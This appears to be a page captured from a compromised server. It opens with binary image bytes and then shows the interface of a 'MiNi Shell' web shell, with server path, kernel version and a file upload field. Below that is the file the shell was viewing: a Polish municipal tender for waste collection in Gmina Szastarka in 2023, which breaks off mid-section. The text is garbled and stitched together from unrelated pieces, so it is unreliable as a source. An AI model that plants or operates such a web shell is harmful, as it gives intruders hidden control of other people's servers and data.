JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221202/0047226001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Odbiór, transport i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Szastarka w 2023 r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SZASTARKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409650</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szastarka 121</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szastarka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-225</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">158714130</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@gminaszastarka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugszastarka.e-biuletyn.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Odbiór, transport i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Szastarka w 2023 r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-02b64f51-7183-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00472260</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039790/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Odbiór, transport i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Szastarka w 2023 r.”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminaszastarka.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminaszastarka.ezamawiajacy.pl https://oneplace.marketplanet.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3 Oświadczenia, wnioski,<br/>zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść<br/>dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji<br/>przekazywanym na adres e-mail Zamawiającego przyjmuje się datę zapisu wiadomości na serwerze odbiorczym. W przypadku<br/>skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich rejestracji na<br/>Platformie.<br/>4 Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu<br/>na subdomenie Gminy Szastarka: https://gminaszastarka.ezamawiajacy.pl lub https://oneplace.marketplanet.pl.<br/>5 Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod<br/>z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>6 Rejestracja konta następuje automatycznie poprzez:<br/>6.1 podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym)<br/>lub<br/>6.2 kontakt z numerem telefonu podanym w potwierdzeniu<br/>lub<br/>6.3 jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie. Konto zostanie aktywowane w ciągu<br/>maksymalnie 6 godzin roboczych<br/>7 Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.<br/>8 Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy<br/>Zakupowej Przez opcję „zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. W celu zadania pytania Zamawiającemu,<br/>Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane<br/>Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka<br/>Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy<br/>„pytanie wysłane&#34;.<br/>9 Treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ, Zamawiający<br/>przekaże Wykonawcom za pośrednictwem Platformy Zakupowej.<br/>10 Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Gminy Szastarka, tel. +48 22 257 22 23<br/>(infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>11 Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/>11.1 dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>11.2 dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.<br/>12 Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>12.1 Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>12.2 Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>12.3 Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>12.4 Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1),<br/>dalej „RODO” ,Zamawiający<br/>informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego<br/>na zadanie pn.: „Odbiór, transport i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu<br/>Gminy Szastarka w 2023 r.”<br/>3) prowadzonym w trybie podstawowym;<br/>4) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 z późn.<br/>zm.), dalej „ustawa Pzp”;<br/>5) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność.<br/>6) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania<br/>o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz<br/>jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego<br/>danych osobowych narusza przepisy RODO;<br/>9) Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa<br/>w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu. W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa w zakresie odbioru, transportu<br/>i zagospodarowania odpadów komunalnych z nieruchomości zamieszkałych na terenie Gminy Szastarka.<br/>4. W terminie 7 dni od podpisania umowy Zamawiający dostarczy Wykonawcy dokładny wykaz nieruchomości, z których<br/>odbierane będą odpady komunalne. Otrzymane dane posłużą Wykonawcy do przygotowania odpowiedniej ilości worków na<br/>odpady komunalne zbierane selektywnie: papier, szkło, metale<br/>i tworzywa sztuczne.<br/>5. Gmina Szastarka zgodnie z „Planem gospodarki odpadami dla województwa lubelskiego 2022” (uchwała Nr<br/>XXIV/349/2016 Sejmiku Województwa Lubelskiego z dnia 2 grudnia 2016 r.) należy do Regionu Centralno – Zachodniego.<br/>6. Wykonawca w ramach realizacji zamówienia zobowiązany jest do:<br/>1) przekazywania odebranych niesegregowanych (zmieszanych) odpadów komunalnych odebranych od właścicieli<br/>nieruchomości zamieszkałych, położonych na terenie Gminy Szastarka bezpośrednio do instalacji komunalnych. Odpady<br/>komunalne zmieszane o kodzie 20 03 01 należy kierować do instalacji komunalnych zapewniających mechanicznobiologiczne<br/>przetwarzanie odpadów komunalnych i wydzielenie ze zmieszanych odpadów komunalnych frakcji nadających<br/>się w całości lub<br/>w części do recyklingu, a jeśli to niemożliwe do odzysku,<br/>2) przekazywania selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów zgodnie<br/>z hierarchią postępowania<br/>z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r.<br/>o odpadach (Dz. U. z 2021 r. poz. 779 z późn. zm.), uwzględniając instalacje, gdzie sposób gospodarowania odpadami<br/>zapewni osiągnięcie na rzecz Zamawiającego odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i<br/>odzysku wynikających z art. 3b ustawy o utrzymaniu czystości i porządku w gminach (tj. Dz.U. z 2022 r. poz. 1297 z późn.<br/>zm.).<br/>7. Zakres rzeczowy przedmiotu zamówienia:<br/>1) Wykonawca zobowiązany jest do odbioru, transportu i zagospodarowania całej ilości odpadów komunalnych<br/>przekazanych przez właścicieli nieruchomości zamieszkałych, w tym: zmieszanych odpadów komunalnych, segregowanych<br/>odpadów komunalnych, w skład których wchodzą następujące frakcje: papier, szkło, metale i tworzywa sztuczne,<br/>bioodpadów; przeterminowanych leków i chemikaliów, zużytych baterii<br/>i akumulatorów, mebli i innych odpadów wielkogabarytowych, odpadów budowlanych pochodzących z drobnych remontów<br/>budynków, powstałych w gospodarstwie domowym, wykonanych we własnym zakresie, nie wymagających pozwolenia na<br/>budowę ani zgłoszenia zamiaru prowadzenie robót budowlanych, popiołu z gospodarstw domowych.<br/>2) Wykonawca w pierwszym miesiącu realizacji zamówienia dostarczy do każdej z nieruchomości po 2 worki na odpady:<br/>„METALE I TWORZYWA SZTUCZNE”,” 1 worek na SZKŁO” i 1 worek na „PAPIER”. Worki na odpady „BIO” w ilości 50<br/>sztuk Wykonawca dostarczy do siedziby Zamawiającego i będzie uzupełniał na wniosek Zamawiającego.<br/>3) Wykonawca zobowiązany jest do zapewnienia i wyposażania nieruchomości, z których odbierane są odpady komunalne<br/>gromadzone w sposób selektywny w przezroczyste worki o pojemności 120 litrów z folii LDPE o grubości zapewniającej<br/>wytrzymałość worków (tj. co najmniej 60 μm) przeznaczone na gromadzenie odpadów segregowanych tj.<br/>a) papier – worki w kolorze niebieskim z napisem „PAPIER”,<br/>b) szkło – worki w kolorze zielonym z napisem „SZKŁO”,<br/>c) metale i tworzywa sztuczne – worki w kolorze żółtym z napisem „METALE I TWORZYWA SZTUCZNE”,<br/>d) bioodpady – worki w kolorze brązowym z napisem „BIO”.<br/>4) Wykonawca jest zobowiązany do sukcesywnego uzupełniania worków przeznaczonych do selektywnej zbiórki (po<br/>każdorazowym odbiorze), poprzez pozostawienie przy nieruchomości, w dniu odbioru odpadów nowych worków w ilości i<br/>rodzaju odpowiadającym ilości odebranych worków z odpadami. Wykonawca jest zobowiązany w uzasadnionych<br/>przypadkach na prośbę właściciela nieruchomości przekazać większą ilość worków na odpady segregowane, niż ta<br/>wynikająca z ilości wystawionych do odbioru.<br/>5) Wykonawca zobowiązany jest do dostarczenia do siedziby Zamawiającego worków przeznaczonych na odpady zbierane<br/>selektywnie. Worki te wydawane będą mieszkańcom Gminy w losowych przypadkach. Worki winny być dostarczone w<br/>terminie 3 dni od daty otrzymania zgłoszenia od Zamawiającego. Zgłoszenie zawierające ilość i rodzaj worków niezbędnych<br/>do dostarczenia zostanie przekazane do siedziby Wykonawcy pocztą elektroniczną.<br/>6) Obowiązkiem Wykonawcy jest uporządkowanie terenu zanieczyszczonego odpadami komunalnymi i innymi<br/>zanieczyszczeniami wysypanymi<br/>z pojemników, kontenerów, worków, pojazdów w trakcie realizacji usługi wywozu oraz gdy zajdzie taka potrzeba poprzez<br/>zabranie dostawionych przy pojemnikach worków ze zmieszanymi odpadami komunalnymi (właściciele nieruchomości mają<br/>możliwość dostawienia tego rodzaju worków w przypadku, gdy pojemność pojemnika w danym okresie będzie<br/>niewystarczająca), jak również przedstawienie Zamawiającemu (jeden raz w miesiącu) sprawozdania z miejsc odbioru tego<br/>rodzaju worków (adres nieruchomości i ilość dostawionych worków) na potrzeby postępowań kontrolnych w zakresie<br/>zgodności zadeklarowanej z faktyczna liczbą osób zamieszkujących daną nieruchomość.<br/>7) Wykonawca zobowiązany jest do odbierania odpadów z poszczególnych nieruchomości zgodnie z ustalonym przez<br/>Wykonawcę i zatwierdzonym przez Zamawiającego harmonogramem wywozu. Wykonawca jest obowiązany do<br/>przedstawienia harmonogramu wywozu odpadów<br/>w terminie 7 dni od podpisania umowy. Wszelkie zmiany harmonogramu będą wymagały zgody Zamawiającego, a<br/>Wykonawca będzie zobowiązany do dostarczenia zmienionych harmonogramów do każdej nieruchomości objętej odbiorem<br/>odpadów komunalnych.<br/>8) Wykonawca jest obowiązany do realizacji reklamacji (nieodebranie<br/>z nieruchomości odpadów zgodnie z harmonogramem, niedostarczenie worków na odpady segregowane itp.) w czasie<br/>wskazanym w ofercie nie dłuższym niż 72 godziny od otrzymania zawiadomienia telefonicznie lub drogą mailową od<br/>Zamawiającego. Wykonanie reklamacji należy niezwłocznie potwierdzić Zamawiającemu.<br/>9) Wykonawca jest zobowiązany do ważenia wszystkich odebranych odpadów komunalnych na legalizowanej wadze i<br/>przekazywania dokumentacji pomiarów (kart wagowych) Zamawiającemu w okresach miesięcznych. Wykonawca jest<br/>zobowiązany do bieżącego prowadzenia ilościowej i jakościowej ewidencji odpadów zgodnie z przepisami ustawy<br/>o odpadach oraz ustawy o utrzymaniu czystości i porządku w gminach<br/>i przekazywania kopii dokumentacji Zamawiającemu.<br/>10) System odbierania odpadów komunalnych nie obejmuje odpadów poprodukcyjnych powstających w wyniku prowadzenia<br/>działalności gospodarczej.<br/>11) Wykonawca zobowiązany jest do weryfikowania poprawności prowadzonej segregacji przez właściciela nieruchomości,<br/>w przypadku niedopełnienia obowiązku segregacji lub prowadzenia segregacji niezgodnej<br/>z obowiązującym Regulaminem utrzymania czystości i porządku na terenie Gminy Szastarka Wykonawca zobowiązany jest<br/>przyjąć odpady jako niesegregowane (zmieszane) i niezwłocznie pisemnie powiadomić<br/>o tym Zamawiającego, nie później niż w ciągu 3 dni. Do informacji Wykonawca zobowiązany będzie załączyć dokumentację<br/>fotograficzną umożliwiającą identyfikację nieruchomości z rejestracją daty, godziny<br/>i numerem porządkowym budynku. W opisanych przypadkach Wykonawca jest zobowiązany do pozostawienia informacji<br/>właścicielowi nieruchomości w formie naklejki „OSTRZEŻENIE - NIEWŁAŚCIWA SEGREGACJA”.<br/>12) Wykonawca zobowiązany jest do przekazywania odebranych niesegregowanych (zmieszanych) odpadów komunalnych<br/>do instalacji komunalnych, a selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania<br/>odpadów zgodnie z hierarchią postepowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o<br/>odpadach.<br/>8. Sposób odbioru odpadów w zależności od rodzaju zabudowy:<br/>1) zabudowa jednorodzinna<br/>Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany pojemnikowo-workowy zbiórki odpadów<br/>komunalnych. Odbiór<br/>i transport odpadów następuje z pojemników ustawionych przy drogach gminnych, powiatowych, wojewódzkich, krajowych<br/>oraz drogach wewnętrznych stanowiących własność Gminy Szastarka.<br/>a) Niesegregowane (zmieszane) odpady komunalne<br/>Niesegregowane (zmieszane) odpady komunalne odbierane będą<br/>z pojemników o pojemności 120 i 240 litrów od właścicieli nieruchomości, na których zamieszkują mieszkańcy (tzw.<br/>nieruchomości zamieszkałych).<br/>Częstotliwość odbioru przez Wykonawcę odpadów niesegregowanych (zmieszanych) – raz w miesiącu, w dni robocze<br/>w godzinach od 7:00 do 19:00.<br/>Właściciel posesji zaopatruje się w pojemnik i zapewnia utrzymanie go w odpowiednim stanie sanitarnym, porządkowym i<br/>technicznym.<br/>b) Odpady komunalne zbierane 